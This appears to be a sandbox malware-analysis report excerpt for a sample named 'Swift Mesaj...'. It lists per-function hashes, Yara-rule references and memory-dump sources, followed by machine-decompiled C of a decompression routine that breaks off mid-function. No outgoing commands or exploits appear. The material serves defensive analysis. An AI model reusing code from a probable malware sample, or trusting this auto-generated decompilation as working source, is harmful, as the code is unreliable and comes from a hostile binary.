Snapshot File: hcaresult_1_2_2af0000_Swift Mesaj#U0131#09971.jbxd

Yara matches

Similarity

API ID:
String ID: U
API String ID: 0-2173590528
Opcode ID: da547c6970ae6fa617036be69cba6a585c132407e374fc776a922bf80b7aa677
Instruction ID: 6b2166b771aef7bad784ec918769f2f32abddbce4718c23b5bee776a873d0ea5
Opcode Fuzzy Hash: da547c6970ae6fa617036be69cba6a585c132407e374fc776a922bf80b7aa677
Instruction Fuzzy Hash: 93815771104349CBDF748EB88EB83DA37A6EF59790F95422ECD9A9F181D7354A82CB00

Uniqueness

Uniqueness Score: -1.00%

Function 02AF087A Relevance: 1.5, Strings: 1, Instructions: 203COMMON

Download Yara Rule

Strings

3, xrefs: 02AF08B8

Memory Dump Source

Source File: 00000001.00000002.7935875493.0000000002AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2af0000_Swift Mesaj#U0131#09971.jbxd

Yara matches

Similarity

API ID:
String ID: 3
API String ID: 0-1842515611
Opcode ID: 09a69f1e01db2e38dfd7e4c8430fe67faa71097c6665bebbfbfd067fc58fd11f
Instruction ID: 24dd91c3f40c82e73a22a92850b356480a5dee5fdf8132c5a915ffa166bddb09
Opcode Fuzzy Hash: 09a69f1e01db2e38dfd7e4c8430fe67faa71097c6665bebbfbfd067fc58fd11f
Instruction Fuzzy Hash: E4416C22E2E315CCF7D220F489903B651678F12351D9286277F6F529DA3E5D09CEC5CA

Uniqueness

Uniqueness Score: -1.00%

Function 02AF06AF Relevance: 1.4, Strings: 1, Instructions: 200COMMON

Download Yara Rule

Strings

3, xrefs: 02AF08B8

Memory Dump Source

Source File: 00000001.00000002.7935875493.0000000002AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2af0000_Swift Mesaj#U0131#09971.jbxd

Yara matches

Similarity

API ID:
String ID: 3
API String ID: 0-1842515611
Opcode ID: 92f231a486a8f69fb1fb237a5088384668980d6787424509aa5200c56662d6a6
Instruction ID: 77a3d4319e7bc8f70412271d6811507f02f5820418c512bc56c8d92e088d2d1d
Opcode Fuzzy Hash: 92f231a486a8f69fb1fb237a5088384668980d6787424509aa5200c56662d6a6
Instruction Fuzzy Hash: 92418A32E2E305CCF7E220F489903B26166CF12341E8286667F6B525DB7E5D098EC5C9

Uniqueness

Uniqueness Score: -1.00%

Function 02B10181 Relevance: 1.4, Strings: 1, Instructions: 190COMMON

Download Yara Rule

Strings

eHa0, xrefs: 02B101BE

Memory Dump Source

Source File: 00000001.00000002.7935875493.0000000002AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2af0000_Swift Mesaj#U0131#09971.jbxd

Yara matches

Similarity

API ID:
String ID: eHa0
API String ID: 0-151678495
Opcode ID: c1957c12cc571375a37de0d91daeb159feafe613951fafe601f2650a9b91da1e
Instruction ID: 45605d36987cdc9017ded5c4f6af4571cfaf0f29c4c3f07f8dc8ed77067f5484
Opcode Fuzzy Hash: c1957c12cc571375a37de0d91daeb159feafe613951fafe601f2650a9b91da1e
Instruction Fuzzy Hash: 7461297254030ACFDB2A5E398A663D73772EF63380F964566CC969F139E3344986CB11

Uniqueness

Uniqueness Score: -1.00%

Function 02AF05D2 Relevance: 1.4, Strings: 1, Instructions: 177COMMON

Download Yara Rule

Strings

3, xrefs: 02AF08B8

Memory Dump Source

Source File: 00000001.00000002.7935875493.0000000002AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2af0000_Swift Mesaj#U0131#09971.jbxd

Yara matches

Similarity

API ID:
String ID: 3
API String ID: 0-1842515611
Opcode ID: f3e1002ef32d9003e7271bd26526835cc859d931f4bec6b93e1f6da8c177a697
Instruction ID: 100666971e51353c22bce9666f62f506f67b4c2b71487daea47109987c5848d6
Opcode Fuzzy Hash: f3e1002ef32d9003e7271bd26526835cc859d931f4bec6b93e1f6da8c177a697
Instruction Fuzzy Hash: 2B418C22E2E315CCF7E220F489903B25166CF12351D9287277F6B529DB3E5E0A8EC5C9

Uniqueness

Uniqueness Score: -1.00%

Function 02AF80D4 Relevance: 1.4, Strings: 1, Instructions: 118COMMON

Download Yara Rule

Strings

`, xrefs: 02AF833B

Memory Dump Source

Source File: 00000001.00000002.7935875493.0000000002AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2af0000_Swift Mesaj#U0131#09971.jbxd

Yara matches

Similarity

API ID:
String ID: `
API String ID: 0-1850852036
Opcode ID: 6777d8f19ccadf5672f26fb0b6c8b1a707dbe279a6097892fd1b1b01d17545a2
Instruction ID: ac696e79358c27924f51fe5293f771e20fe58025908876c4e6b04e550d460d0a
Opcode Fuzzy Hash: 6777d8f19ccadf5672f26fb0b6c8b1a707dbe279a6097892fd1b1b01d17545a2
Instruction Fuzzy Hash: D6414A32605398CFEF758E388A853CA7773AF866A4F85494EDCC977019D335098ACB05

Uniqueness

Uniqueness Score: -1.00%

Function 02AF80D2 Relevance: 1.4, Strings: 1, Instructions: 103COMMON

Download Yara Rule

Strings

`, xrefs: 02AF833B

Memory Dump Source

Source File: 00000001.00000002.7935875493.0000000002AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2af0000_Swift Mesaj#U0131#09971.jbxd

Yara matches

Similarity

API ID:
String ID: `
API String ID: 0-1850852036
Opcode ID: 9245913e4a9e02d21743606b5bfa04c38e5be3fa952db77d0363b8afd050da34
Instruction ID: 9be55737274397db509adb14526d0b7c9d8432d5335e6cf65d99f8af7b4d5454
Opcode Fuzzy Hash: 9245913e4a9e02d21743606b5bfa04c38e5be3fa952db77d0363b8afd050da34
Instruction Fuzzy Hash: A9312A71544789CEDFB58E288D953CB3363AF52390F91421BDC8C6B158D73A4A8B8606

Uniqueness

Uniqueness Score: -1.00%

Function 02B11EDB Relevance: 1.3, Strings: 1, Instructions: 94COMMON

Download Yara Rule

Strings

:9, xrefs: 02B11F3D

Memory Dump Source

Source File: 00000001.00000002.7935875493.0000000002AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2af0000_Swift Mesaj#U0131#09971.jbxd

Yara matches

Similarity

API ID:
String ID: :9
API String ID: 0-997541006
Opcode ID: 103f599d8ea935fa1c23b88159e71c8ad924d42935ff331c714c125db3db3d23
Instruction ID: 40b1133072e4dc1ac0916f36ae5add237b1f397980e7ca07554b09fb6a1deb0a
Opcode Fuzzy Hash: 103f599d8ea935fa1c23b88159e71c8ad924d42935ff331c714c125db3db3d23
Instruction Fuzzy Hash: 3431D67224434A9FCF308E28C9F47DA3392EF56784FC58169CDCA8B545E335088BC20A

Uniqueness

Uniqueness Score: -1.00%

Function 02B1345E Relevance: .8, Instructions: 764COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.7935875493.0000000002AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2af0000_Swift Mesaj#U0131#09971.jbxd

Yara matches

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: f370d65dd3f5cd763496b04c733c9738d70e5636a65c96fef1da37c6c26d6321
Instruction ID: 84d30629f7d34e9c06352b0bb36bd3d5f8c4e1b8198b0f01759ebdc663b6cbf1
Opcode Fuzzy Hash: f370d65dd3f5cd763496b04c733c9738d70e5636a65c96fef1da37c6c26d6321
Instruction Fuzzy Hash: AB523D315083858FDB259F3888A87DA7BE29F56360FC982DACCD98F296D3358585C712

Uniqueness

Uniqueness Score: -1.00%

Function 02AF688B Relevance: .4, Instructions: 439COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.7935875493.0000000002AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2af0000_Swift Mesaj#U0131#09971.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dc971b9e444f6d4bca079ffdd80a6896ed2c1cd77a199994b904be1ad622e71d
Instruction ID: 62715b28f4e798cd7d4d13cff88a261c7c97a898b813de8198c6b993bbc7884e
Opcode Fuzzy Hash: dc971b9e444f6d4bca079ffdd80a6896ed2c1cd77a199994b904be1ad622e71d
Instruction Fuzzy Hash: E9F1A832204389CFDF358F7889A53DA3BB6EF95764F88456ECC9A9B156D3314946CB00

Uniqueness

Uniqueness Score: -1.00%

Function 00406ADD Relevance: .3, Instructions: 334
COMMONCrypto

Download Yara Rule

C-Code - Quality: 79%

			E00406ADD(signed int __ebx, signed int* __esi) {
				signed int _t396;
				signed int _t425;
				signed int _t442;
				signed int _t443;
				signed int* _t446;
				void* _t448;

				L0:
				while(1) {
					L0:
					_t446 = __esi;
					_t425 = __ebx;
					if( *(_t448 - 0x34) == 0) {
						break;
					}
					L55:
					__eax =  *(__ebp - 0x38);
					 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
					__ecx = __ebx;
					 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
					 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
					 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
					__ebx = __ebx + 8;
					while(1) {
						L56:
						if(__ebx < 0xe) {
							goto L0;
						}
						L57:
						__eax =  *(__ebp - 0x40);
						__eax =  *(__ebp - 0x40) & 0x00003fff;
						__ecx = __eax;
						__esi[1] = __eax;
						__ecx = __eax & 0x0000001f;
						if(__cl > 0x1d) {
							L9:
							_t443 = _t442 | 0xffffffff;
							 *_t446 = 0x11;
							L10:
							_t446[0x147] =  *(_t448 - 0x40);
							_t446[0x146] = _t425;
							( *(_t448 + 8))[1] =  *(_t448 - 0x34);
							L11:
							 *( *(_t448 + 8)) =  *(_t448 - 0x38);
							_t446[0x26ea] =  *(_t448 - 0x30);
							E0040724C( *(_t448 + 8));
							return _t443;
						}
						L58:
						__eax = __eax & 0x000003e0;
						if(__eax > 0x3a0) {
							goto L9;
						}
						L59:
						 *(__ebp - 0x40) =  *(__ebp - 0x40) >> 0xe;
						__ebx = __ebx - 0xe;
						_t94 =  &(__esi[2]);
						 *_t94 = __esi[2] & 0x00000000;
						 *__esi = 0xc;
						while(1) {
							L60:
							__esi[1] = __esi[1] >> 0xa;
							__eax = (__esi[1] >> 0xa) + 4;
							if(__esi[2] >= (__esi[1] >> 0xa) + 4) {
								goto L68;
							}
							L61:
							while(1) {
								L64:
								if(__ebx >= 3) {
									break;
								}
								L62:
								if( *(__ebp - 0x34) == 0) {
									goto L182;
								}
								L63:
								__eax =  *(__ebp - 0x38);
								 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
								__ecx = __ebx;
								 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
								 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
								 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
								__ebx = __ebx + 8;
							}
							L65:
							__ecx = __esi[2];
							 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000007;
							__ebx = __ebx - 3;
							_t108 = __ecx + 0x4084cc; // 0x121110
							__ecx =  *_t108;
							 *(__ebp - 0x40) =  *(__ebp - 0x40) >> 3;
							 *(__esi + 0xc +  *_t108 * 4) =  *(__ebp - 0x40) & 0x00000007;
							__ecx = __esi[1];
							__esi[2] = __esi[2] + 1;
							__eax = __esi[2];
							__esi[1] >> 0xa = (__esi[1] >> 0xa) + 4;
							if(__esi[2] < (__esi[1] >> 0xa) + 4) {
								goto L64;
							}
							L66:
							while(1) {
								L68:
								if(__esi[2] >= 0x13) {
									break;
								}
								L67:
								_t119 = __esi[2] + 0x4084cc; // 0x4000300
								__eax =  *_t119;
								 *(__esi + 0xc +  *_t119 * 4) =  *(__esi + 0xc +  *_t119 * 4) & 0x00000000;
								_t126 =  &(__esi[2]);
								 *_t126 = __esi[2] + 1;
							}
							L69:
							__ecx = __ebp - 8;
							__edi =  &(__esi[0x143]);
							 &(__esi[0x148]) =  &(__esi[0x144]);
							__eax = 0;
							 *(__ebp - 8) = 0;
							__eax =  &(__esi[3]);
							 *__edi = 7;
							__eax = E004072B4( &(__esi[3]), 0x13, 0x13, 0, 0,  &(__esi[0x144]), __edi,  &(__esi[0x148]), __ebp - 8);
							if(__eax != 0) {
								L72:
								 *__esi = 0x11;
								while(1) {
									L180:
									_t396 =  *_t446;
									if(_t396 > 0xf) {
										break;
									}
									L1:
									switch( *((intOrPtr*)(_t396 * 4 +  &M0040720C))) {
										case 0:
											L101:
											__eax = __esi[4] & 0x000000ff;
											__esi[3] = __esi[4] & 0x000000ff;
											__eax = __esi[5];
											__esi[2] = __esi[5];
											 *__esi = 1;
											goto L102;
										case 1:
											L102:
											__eax = __esi[3];
											while(1) {
												L105:
												__eflags = __ebx - __eax;
												if(__ebx >= __eax) {
													break;
												}
												L103:
												__eflags =  *(__ebp - 0x34);
												if( *(__ebp - 0x34) == 0) {
													goto L182;
												}
												L104:
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
												__ecx = __ebx;
												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
												__ebx = __ebx + 8;
												__eflags = __ebx;
											}
											L106:
											__eax =  *(0x40a5a4 + __eax * 2) & 0x0000ffff;
											__eax = __eax &  *(__ebp - 0x40);
											__ecx = __esi[2];
											__eax = __esi[2] + __eax * 4;
											__ecx =  *(__eax + 1) & 0x000000ff;
											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
											__ebx = __ebx - ( *(__eax + 1) & 0x000000ff);
											__ecx =  *__eax & 0x000000ff;
											__eflags = __ecx;
											if(__ecx != 0) {
												L108:
												__eflags = __cl & 0x00000010;
												if((__cl & 0x00000010) == 0) {
													L110:
													__eflags = __cl & 0x00000040;
													if((__cl & 0x00000040) == 0) {
														goto L125;
													}
													L111:
													__eflags = __cl & 0x00000020;
													if((__cl & 0x00000020) == 0) {
														goto L9;
													}
													L112:
													 *__esi = 7;
													goto L180;
												}
												L109:
												__esi[2] = __ecx;
												__esi[1] = __eax;
												 *__esi = 2;
												goto L180;
											}
											L107:
											__esi[2] = __eax;
											 *__esi = 6;
											goto L180;
										case 2:
											L113:
											__eax = __esi[2];
											while(1) {
												L116:
												__eflags = __ebx - __eax;
												if(__ebx >= __eax) {
													break;
												}
												L114:
												__eflags =  *(__ebp - 0x34);
												if( *(__ebp - 0x34) == 0) {
													goto L182;
												}
												L115:
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
												__ecx = __ebx;
												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
												__ebx = __ebx + 8;
												__eflags = __ebx;
											}
											L117:
											 *(0x40a5a4 + __eax * 2) & 0x0000ffff =  *(0x40a5a4 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
											__esi[1] = __esi[1] + ( *(0x40a5a4 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
											__ecx = __eax;
											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
											__ebx = __ebx - __eax;
											__eflags = __ebx;
											__eax = __esi[4] & 0x000000ff;
											__esi[3] = __esi[4] & 0x000000ff;
											__eax = __esi[6];
											__esi[2] = __esi[6];
											 *__esi = 3;
											goto L118;
										case 3:
											L118:
											__eax = __esi[3];
											while(1) {
												L121:
												__eflags = __ebx - __eax;
												if(__ebx >= __eax) {
													break;
												}
												L119:
												__eflags =  *(__ebp - 0x34);
												if( *(__ebp - 0x34) == 0) {
													goto L182;
												}
												L120:
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
												__ecx = __ebx;
												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
												__ebx = __ebx + 8;
												__eflags = __ebx;
											}
											L122:
											__eax =  *(0x40a5a4 + __eax * 2) & 0x0000ffff;
											__eax = __eax &  *(__ebp - 0x40);
											__ecx = __esi[2];
											__eax = __esi[2] + __eax * 4;
											__ecx =  *(__eax + 1) & 0x000000ff;
											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
											__ebx = __ebx - ( *(__eax + 1) & 0x000000ff);
											__ecx =  *__eax & 0x000000ff;
											__eflags = __cl & 0x00000010;
											if((__cl & 0x00000010) == 0) {
												L124:
												__eflags = __cl & 0x00000040;
												if((__cl & 0x00000040) != 0) {
													goto L9;
												}
												L125:
												__esi[3] = __ecx;
												__ecx =  *(__eax + 2) & 0x0000ffff;
												__esi[2] = __eax;
												goto L180;
											}
											L123:
											__esi[2] = __ecx;
											__esi[3] = __eax;
											 *__esi = 4;
											goto L180;
										case 4:
											L126:
											__eax = __esi[2];
											while(1) {
												L129:
												__eflags = __ebx - __eax;
												if(__ebx >= __eax) {
													break;
												}
												L127:
												__eflags =  *(__ebp - 0x34);
												if( *(__ebp - 0x34) == 0) {
													goto L182;
												}
												L128:
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
												__ecx = __ebx;
												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
												__ebx = __ebx + 8;
												__eflags = __ebx;
											}
											L130:
											 *(0x40a5a4 + __eax * 2) & 0x0000ffff =  *(0x40a5a4 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
											__esi[3] = __esi[3] + ( *(0x40a5a4 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
											__ecx = __eax;
											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
											__ebx = __ebx - __eax;
											__eflags = __ebx;
											 *__esi = 5;
											goto L131;
										case 5:
											L131:
											__eax =  *(__ebp - 0x30);
											__edx = __esi[3];
											__eax = __eax - __esi;
											__ecx = __eax - __esi - 0x1ba0;
											__eflags = __eax - __esi - 0x1ba0 - __edx;
											if(__eax - __esi - 0x1ba0 >= __edx) {
												__ecx = __eax;
												__ecx = __eax - __edx;
												__eflags = __ecx;
											} else {
												__esi[0x26e8] = __esi[0x26e8] - __edx;
												__ecx = __esi[0x26e8] - __edx - __esi;
												__ecx = __esi[0x26e8] - __edx - __esi + __eax - 0x1ba0;
											}
											__eflags = __esi[1];
											 *(__ebp - 0x20) = __ecx;
											if(__esi[1] != 0) {
												L135:
												__edi =  *(__ebp - 0x2c);
												do {
													L136:
													__eflags = __edi;
													if(__edi != 0) {
														goto L152;
													}
													L137:
													__edi = __esi[0x26e8];
													__eflags = __eax - __edi;
													if(__eax != __edi) {
														L143:
														__esi[0x26ea] = __eax;
														__eax = E0040724C( *((intOrPtr*)(__ebp + 8)));
														__eax = __esi[0x26ea];
														__ecx = __esi[0x26e9];
														__eflags = __eax - __ecx;
														 *(__ebp - 0x30) = __eax;
														if(__eax >= __ecx) {
															__edi = __esi[0x26e8];
															__edi = __esi[0x26e8] - __eax;
															__eflags = __edi;
														} else {
															__ecx = __ecx - __eax;
															__edi = __ecx - __eax - 1;
														}
														__edx = __esi[0x26e8];
														__eflags = __eax - __edx;
														 *(__ebp - 8) = __edx;
														if(__eax == __edx) {
															__edx =  &(__esi[0x6e8]);
															__eflags = __ecx - __edx;
															if(__ecx != __edx) {
																__eax = __edx;
																__eflags = __eax - __ecx;
																 *(__ebp - 0x30) = __eax;
																if(__eax >= __ecx) {
																	__edi =  *(__ebp - 8);
																	__edi =  *(__ebp - 8) - __eax;
																	__eflags = __edi;
																} else {
																	__ecx = __ecx - __eax;
																	__edi = __ecx;
																}
															}
														}
														__eflags = __edi;
														if(__edi == 0) {
															goto L183;
														} else {
															goto L152;
														}
													}
													L138:
													__ecx = __esi[0x26e9];
													__edx =  &(__esi[0x6e8]);
													__eflags = __ecx - __edx;
													if(__ecx == __edx) {
														goto L143;
													}
													L139:
													__eax = __edx;
													__eflags = __eax - __ecx;
													if(__eax >= __ecx) {
														__edi = __edi - __eax;
														__eflags = __edi;
													} else {
														__ecx = __ecx - __eax;
														__edi = __ecx;
													}
													__eflags = __edi;
													if(__edi == 0) {
														goto L143;
													}
													L152:
													__ecx =  *(__ebp - 0x20);
													 *__eax =  *__ecx;
													__eax = __eax + 1;
													__ecx = __ecx + 1;
													__edi = __edi - 1;
													__eflags = __ecx - __esi[0x26e8];
													 *(__ebp - 0x30) = __eax;
													 *(__ebp - 0x20) = __ecx;
													 *(__ebp - 0x2c) = __edi;
													if(__ecx == __esi[0x26e8]) {
														__ecx =  &(__esi[0x6e8]);
														 *(__ebp - 0x20) =  &(__esi[0x6e8]);
													}
													_t357 =  &(__esi[1]);
													 *_t357 = __esi[1] - 1;
													__eflags =  *_t357;
												} while ( *_t357 != 0);
											}
											goto L23;
										case 6:
											L156:
											__eax =  *(__ebp - 0x2c);
											__edi =  *(__ebp - 0x30);
											__eflags = __eax;
											if(__eax != 0) {
												L172:
												__cl = __esi[2];
												 *__edi = __cl;
												__edi = __edi + 1;
												__eax = __eax - 1;
												 *(__ebp - 0x30) = __edi;
												 *(__ebp - 0x2c) = __eax;
												goto L23;
											}
											L157:
											__ecx = __esi[0x26e8];
											__eflags = __edi - __ecx;
											if(__edi != __ecx) {
												L163:
												__esi[0x26ea] = __edi;
												__eax = E0040724C( *((intOrPtr*)(__ebp + 8)));
												__edi = __esi[0x26ea];
												__ecx = __esi[0x26e9];
												__eflags = __edi - __ecx;
												 *(__ebp - 0x30) = __edi;
												if(__edi >= __ecx) {
													__eax = __esi[0x26e8];
													__eax = __esi[0x26e8] - __edi;
													__eflags = __eax;
												} else {
													__ecx = __ecx - __edi;
													__eax = __ecx - __edi - 1;
												}
												__edx = __esi[0x26e8];
												__eflags = __edi - __edx;
												 *(__ebp - 8) = __edx;
												if(__edi == __edx) {
													__edx =  &(__esi[0x6e8]);
													__eflags = __ecx - __edx;
													if(__ecx != __edx) {
														__edi = __edx;
														__eflags = __edi - __ecx;
														 *(__ebp - 0x30) = __edi;
														if(__edi >= __ecx) {
															__eax =  *(__ebp - 8);
															__eax =  *(__ebp - 8) - __edi;
															__eflags = __eax;
														} else {
															__ecx = __ecx - __edi;
															__eax = __ecx;
														}
													}
												}
												__eflags = __eax;
												if(__eax == 0) {
													goto L183;
												} else {
													goto L172;
												}
											}
											L158:
											__eax = __esi[0x26e9];
											__edx =  &(__esi[0x6e8]);
											__eflags = __eax - __edx;
											if(__eax == __edx) {
												goto L163;
											}
											L159:
											__edi = __edx;
											__eflags = __edi - __eax;
											if(__edi >= __eax) {
												__ecx = __ecx - __edi;
												__eflags = __ecx;
												__eax = __ecx;
											} else {
												__eax = __eax - __edi;
												__eax = __eax - 1;
											}
											__eflags = __eax;
											if(__eax != 0) {
												goto L172;
											} else {
												goto L163;
											}
										case 7:
											L173:
											__eflags = __ebx - 7;
											if(__ebx > 7) {
												__ebx = __ebx - 8;
												 *(__ebp - 0x34) =  *(__ebp - 0x34) + 1;
												_t380 = __ebp - 0x38;
												 *_t380 =  *(__ebp - 0x38) - 1;
												__eflags =  *_t380;
											}
											goto L175;
										case 8:
											L4:
											while(_t425 < 3) {
												if( *(_t448 - 0x34) == 0) {
													goto L182;
												} else {
													 *(_t448 - 0x34) =  *(_t448 - 0x34) - 1;
													 *(_t448 - 0x40) =  *(_t448 - 0x40) | ( *( *(_t448 - 0x38)) & 0x000000ff) << _t425;
													 *(_t448 - 0x38) =  &(( *(_t448 - 0x38))[1]);
													_t425 = _t425 + 8;
													continue;
												}
											}
											_t425 = _t425 - 3;
											 *(_t448 - 0x40) =  *(_t448 - 0x40) >> 3;
											_t406 =  *(_t448 - 0x40) & 0x00000007;
											asm("sbb ecx, ecx");
											_t408 = _t406 >> 1;
											_t446[0x145] = ( ~(_t406 & 0x00000001) & 0x00000007) + 8;
											if(_t408 == 0) {
												L24:
												 *_t446 = 9;
												_t436 = _t425 & 0x00000007;
												 *(_t448 - 0x40) =  *(_t448 - 0x40) >> _t436;
												_t425 = _t425 - _t436;
												goto L180;
											}
											L6:
											_t411 = _t408 - 1;
											if(_t411 == 0) {
												L13:
												__eflags =  *0x432e70;
												if( *0x432e70 != 0) {
													L22:
													_t412 =  *0x40a5c8; // 0x9
													_t446[4] = _t412;
													_t413 =  *0x40a5cc; // 0x5
													_t446[4] = _t413;
													_t414 =  *0x431cec; // 0x4325f0
													_t446[5] = _t414;
													_t415 =  *0x431ce8; // 0x432df0
													_t446[6] = _t415;
													L23:
													 *_t446 =  *_t446 & 0x00000000;
													goto L180;
												} else {
													_t26 = _t448 - 8;
													 *_t26 =  *(_t448 - 8) & 0x00000000;
													__eflags =  *_t26;
													_t416 = 0x431cf0;
													goto L15;
													L20:
													 *_t416 = _t438;
													_t416 = _t416 + 4;
													__eflags = _t416 - 0x432170;
													if(_t416 < 0x432170) {
														L15:
														__eflags = _t416 - 0x431f2c;
														_t438 = 8;
														if(_t416 > 0x431f2c) {
															__eflags = _t416 - 0x4320f0;
															if(_t416 >= 0x4320f0) {
																__eflags = _t416 - 0x432150;
																if(_t416 < 0x432150) {
																	_t438 = 7;
																}
															} else {
																_t438 = 9;
															}
														}
														goto L20;
													} else {
														E004072B4(0x431cf0, 0x120, 0x101, 0x4084e0, 0x408520, 0x431cec, 0x40a5c8, 0x4325f0, _t448 - 8);
														_push(0x1e);
														_pop(_t440);
														_push(5);
														_pop(_t419);
														memset(0x431cf0, _t419, _t440 << 2);
														_t450 = _t450 + 0xc;
														_t442 = 0x431cf0 + _t440;
														E004072B4(0x431cf0, 0x1e, 0, 0x408560, 0x40859c, 0x431ce8, 0x40a5cc, 0x4325f0, _t448 - 8);
														 *0x432e70 =  *0x432e70 + 1;
														__eflags =  *0x432e70;
														goto L22;
													}
												}
											}
											L7:
											_t423 = _t411 - 1;
											if(_t423 == 0) {
												 *_t446 = 0xb;
												goto L180;
											}
											L8:
											if(_t423 != 1) {
												goto L180;
											}
											goto L9;
										case 9:
											while(1) {
												L27:
												__eflags = __ebx - 0x20;
												if(__ebx >= 0x20) {
													break;
												}
												L25:
												__eflags =  *(__ebp - 0x34);
												if( *(__ebp - 0x34) == 0) {
													goto L182;
												}
												L26:
												__eax =  *(__ebp - 0x38);
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
												__ecx = __ebx;
												 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
												__ebx = __ebx + 8;
												__eflags = __ebx;
											}
											L28:
											__eax =  *(__ebp - 0x40);
											__ebx = 0;
											__eax =  *(__ebp - 0x40) & 0x0000ffff;
											 *(__ebp - 0x40) = 0;
											__eflags = __eax;
											__esi[1] = __eax;
											if(__eax == 0) {
												goto L53;
											}
											L29:
											_push(0xa);
											_pop(__eax);
											goto L54;
										case 0xa:
											L30:
											__eflags =  *(__ebp - 0x34);
											if( *(__ebp - 0x34) == 0) {
												goto L182;
											}
											L31:
											__eax =  *(__ebp - 0x2c);
											__eflags = __eax;
											if(__eax != 0) {
												L48:
												__eflags = __eax -  *(__ebp - 0x34);
												if(__eax >=  *(__ebp - 0x34)) {
													__eax =  *(__ebp - 0x34);
												}
												__ecx = __esi[1];
												__eflags = __ecx - __eax;
												__edi = __ecx;
												if(__ecx >= __eax) {
													__edi = __eax;
												}
												__eax = E00405D2F( *(__ebp - 0x30),  *(__ebp - 0x38), __edi);
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + __edi;
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - __edi;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __edi;
												 *(__ebp - 0x2c) =  *(__ebp - 0x2c) - __edi;
												_t80 =  &(__esi[1]);
												 *_t80 = __esi[1] - __edi;
												__eflags =  *_t80;
												if( *_t80 == 0) {
													L53:
													__eax = __esi[0x145];
													L54:
													 *__esi = __eax;
												}
												goto L180;
											}
											L32:
											__ecx = __esi[0x26e8];
